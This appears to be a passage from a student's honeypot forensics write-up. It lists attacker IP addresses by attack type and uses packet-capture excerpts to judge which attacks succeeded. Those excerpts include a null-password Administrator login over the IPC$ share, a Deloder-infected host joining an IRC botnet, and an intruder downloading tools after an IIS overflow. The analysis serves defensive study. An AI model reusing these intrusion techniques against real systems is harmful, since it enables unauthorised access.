208.186.61.2

209.45.125.69

209.45.125.110

210.12.211.121

210.203.189.77

210.214.49.227

210.58.0.25

211.149.57.197

212.110.30.110

13.107.105.72

213.116.166.126

213.217.55.243

213.44.104.92

213.7.60.57

213.84.75.42

216.170.214.226

216.228.8.158

217.1.35.169

217.222.201.82

217.227.245.101

217.227.98.82

218.163.9.89

218.237.70.119

218.87.178.167

219.118.31.42

219.65.37.37

219.94.46.57

24.107.117.237

24.161.196.103

4.64.221.42

61.11.11.54

61.111.101.78

61.14.66.92

61.140.149.137

61.155.126.150

61.177.154.228

61.55.71.169

62.127.38.198

62.194.4.114

62.201.96.159

62.251.129.118

64.17.250.240

64.254.203.68

66.139.10.15

66.190.67.122

66.73.160.240

66.8.163.125

66.92.135.108

68.115.33.110

68.152.53.138

68.154.11.82

80.181.116.202

81.114.77.37

81.202.125.5

81.50.177.167

210.22.204.101

24.197.194.106

 

W32.HLLW.Deloder Worm: 61.111.101.78

 

Code Red Worm:

            Retina CodeRed Scanner: 68.169.174.108

            Code Red Worm: 218.25.147.83

 

Other IIS Buffer Overflows:

24.197.194.106

210.22.204.101

 

Directory Traversing Vulnerability:

24.197.194.106

 

FX-Scanner:

Accessed FTP: 141.85.37.78 and 203.170.177

Accessed port 57 and HTTP:  192.130.71.66 and 213.23.49.158

 

DameWare Remote Control Agent Vulnerability

210.22.204.101

 

Microsoft SQL Server Vulnerability

12.252.61.161

12.253.142.87

12.83.147.97

168.243.103.205

192.215.160.106

194.199.201.9

200.135.228.10

200.50.124.2

205.180.159.35

206.149.148.192

210.111.56.66

212.122.20.74

212.162.165.18

213.122.77.74

213.170.56.83

216.192.145.21

216.229.73.11

217.35.65.9

218.244.66.32

218.4.48.74

218.4.65.115

218.4.87.137

218.4.99.237

218.92.13.142

219.145.211.132

219.145.211.3

24.167.221.106

24.74.199.104

4.33.244.44

61.132.88.50

61.132.88.90

61.134.45.19

61.150.120.72

61.150.72.7

61.177.56.98

61.177.62.66

61.185.212.166

61.185.215.42

61.185.242.190

61.185.29.9

61.203.104.148

61.8.1.64

66.233.4.225

66.81.131.17

67.201.75.38

67.81.161.166

68.37.54.69

68.45.123.130

68.84.210.227

81.57.217.208

 

rpc.statd Vulnerability

204.50.186.37

212.243.23.179

 

Hack´a´Tack

62.150.170.134

62.150.170.232

 

SOCKS Vulnerability

200.74.26.73

 

3.  Which attacks were successful?

 

Windows 2000 NetBIOS vulnerabilities

 

Those attackers that attempted to map the C drive through port 137 were unsuccessful. 

 

8 0.514274    219.118.31.42         172.16.134.191        SMB      Tree Connect AndX Request, Path: \\PC0191\C

9 0.517180    172.16.134.191        219.118.31.42         TCP      netbios-ssn > 2388 [RST] Seq=2476847245 Ack=1943715703 Win=0 Len=0

 

In packet #9, the honeypot returned the [RST] bit (RESET) which means that it could not establish a connection.  This would have worked on an older version of Windows. However, in Windows 2000, the attacker has to log onto the IPC$ share instead like this:

 

925 322205.478544 210.22.204.101        172.16.134.191        SMB      Tree Connect AndX Request, Path: \\172.16.134.191\IPC$

294 236849.783405 172.16.134.191        195.36.247.77         SMB      Tree Connect AndX Response

 

All the attackers that logged into the honeypot through the IPC$ share were successful.  They logged in to the Administrator account using the NULL password.

 

W32.HLLW.Deloder Worm

 

61.111.101.78 succeeded in exploiting the honeypot with the Deloder Worm.  As I described in the Vulnerabilities section, the worm logged in through the IPC$ share and installed the PSEXESVC.EXE and INST.EXE files.  Right after 61.111.101.78 finished communicating with the honeypot, the honeypot began attempting to log on to the IRC servers like so:

 

34821 412112.717027 172.16.134.191        209.126.161.29        TCP      1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191        66.33.65.58           TCP      1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191        63.241.174.144        TCP      1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191        217.199.175.10        TCP      1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0

 

This tells us that 61.111.101.78 successfully exploited the honeypot and executed commands on the honeypot telling it to log on to an IRC Server and await commands.  The honey pot succeeded in logging in to the IRC Server 209.196.44.172.  This IRC chatroom is a botnet that interacted with at least 6639 distinct hosts while the honeypot was logged in.  A little while after the honeypot logged into the botnet, it received an order to send the following packets:

 

39390 418489.571532 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39394 418492.509669 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39397 418498.652595 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

 

These packets were an attack on 199.107.7.2.  They were sent to TCP port 31337 which is the port that Back

Orifice and a number of other Trojans run on.  However the honeypot received no response from 199.107.7.2.

 

Code Red Worm

 

After 218.25.147.83 launched the Code Red attack on the honeypot, it no longer interacted with the honeypot.  Since the honeypot did not proceed to send the Code Red virus to other machines, I am assuming that the attack was unsuccessful.

 

Other IIS Buffer Overflows

 

24.197.194.106 attempted a buffer overflow similar to the one described in the Vulnerabilities section.  However, it was unable to exploit the honeypot.

 

It appears that the buffer overflow attempted by 210.22.204.101 was successful.  Right after the buffer overflow, 210.22.204.101 was able to successfully connect with the honeypot on TCP port 4899 which is the Remote Administrator port.  The Remote Administrator is used to control a computer remotely.  It is often used by technical support staff to assist someone in fixing their computer.  210.22.204.101 uses the Remote Administrator to surf the internet in search of two tools: ZipCentral (zcsetup.exe) and FoundStone Fport (fport.zip).  The ZipCentral program is presumably used to unzip the Fport program.  Fport is a legitimate utility used to identify unknown open ports.  The files requests appear below:

 

18726 332245.693463 172.16.134.191        217.151.192.231       HTTP     GET /users/z/zcentral/zcsetup.exe HTTP/1.1

20815 335390.704047 172.16.134.191        216.154.242.126       HTTP     GET /knowledge/zips/fport.zip HTTP/1.1

 

The attacker successfully downloads the files.  Most likely, the attacker plans on using the honeypot to scan other computers and attack them at a later date.  He has probably left a backdoor on the honeypot.

 

Directory Traversing Vulnerability

 

24.197.194.106 attempted to exploit the honeypot’s IIS using directory traversing.  There is no reason to believe that it succeeded.

 

FX-Scanner

 

The scans were successful, but the honeypot was not harmed.

 

DameWare Remote Control Agent Vulnerability

 

DameWare Remote Control Agent was not running on the honeypot and port 6129 was not open so an attack was unsuccessful.

 

Microsoft SQL Server Vulnerability

 

Microsoft SQL Server was not running on the honeypot and port 1434 was not open so an attack was unsuccessful.

 

rpc.statd Vulnerability

 

Microsoft SQL Server was not running on the honeypot and port 111 was not open so an attack was unsuccessful.

 

Hack´a´Tack

 

The Hack´a´Tack was unsuccessful.

 

SOCKS Vulnerability

 

SOCKS was not running on the honeypot and port 1080 was not open so an attack was unsuccessful.

 

General Questions

 

1.  What did you learn about analysis as a result of studying this scan?

 

I learned how to use Ethereal and Snort for the first time.  I discovered how many different attacks are out there and how vulnerable Windows 2000 is.  My fundamental understanding of packet-based networking has improved.

 

 

2.  How do you anticipate being able to apply your new knowledge and skills?

First of all, I will update my own Windows 2000 system.  I feel that upon graduating from college, I will be able to put these new skills to use in my profession.

 

 

3.  How can we improve the SotM challenge? What would you like to see added? What would you like to see done differently?

No complaints.

 

 

Sources and Useful Links:

 

A Short IRC Primer: http://www.irchelp.org/irchelp/ircprimer.html

Just What is a Botnet? http://zine.dal.net/previousissues/issue22/botnet.php

Ports List: http://www.neohapsis.com/neolabs/neo-ports/neo-ports.html

Buffer Overflow in IIS info: http://www.eeye.com/html/Research/Advisories/AD20010618.html

Deloder Worm Analysis: http://www.klcconsulting.net/deloder_worm.htm

Input Validation Problem in rpc.statd: http://www.cert.org/advisories/CA-2000-17.html

Firewall Forensics: http://www.robertgraham.com/pubs/firewall-seen.html

"Code Red" Worm Exploiting Buffer Overflow In IIS: http://www.cert.org/advisories/CA-2001-19.html

TCP 6129 ? Dameware: http://lists.insecure.org/lists/incidents/2002/Aug/0107.html